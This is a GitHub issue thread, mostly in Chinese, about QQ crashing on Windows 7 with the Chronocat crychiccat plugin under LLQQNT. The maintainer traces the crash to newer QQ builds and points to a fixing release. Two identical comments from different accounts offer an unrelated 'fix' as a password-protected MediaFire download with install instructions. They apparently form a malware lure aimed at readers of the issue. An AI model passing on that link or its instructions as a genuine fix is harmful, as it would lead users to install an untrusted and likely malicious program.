### ISSUE TITLE
Bug: Windows7上使用LLQQNT安装Crychiccat导致QQ崩溃

### ISSUE THREAD

**Issue by 2659170494** [chrononeko/bugtracker#79]
OS: Windows 7
Plugins: chronocat-llqqnt-*-v0.2.15、LLOneBot
LLQQNT Version:1.2.1

看了下dmp，似乎是hook出问题了

[Documents.zip](https://github.com/user-attachments/files/16778283/Documents.zip)

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ilharp** [comment]
应该不是 Win7 的问题而是 QQ 版本太高了，最近比较忙，以后有时间修

目前我印象里：

- 应该用不了的：27391、27333、27254、27206、27187
- 不知道能不能用的：26909、26880、26740、26702、26466
- 应该能用的：26339、26299 往下所有版本

**Comment by 2659170494** [comment]
> 应该不是 Win7 的问题而是 QQ 版本太高了，最近比较忙，以后有时间修
> 
> 目前我印象里：
> 
> * 应该用不了的：27391、27333、27254、27206、27187
> * 不知道能不能用的：26909、26880、26740、26702、26466
> * 应该能用的：26339、26299 往下所有版本

啊是的，我在昨天的时候因为服务器太久没用导致版本过老没有办法登录。然后升级了QQ之后就这样了😂

QQNT的版本是9.9.15-27391

**Comment by ilharp** [comment]
[v0.2.18](https://github.com/chrononeko/chronocat/releases/tag/v0.2.18) 的 crychiccat 引擎适配了 27187 及以上版本 QQ。要使用的话推荐更新 QQ 到最新版后使用。
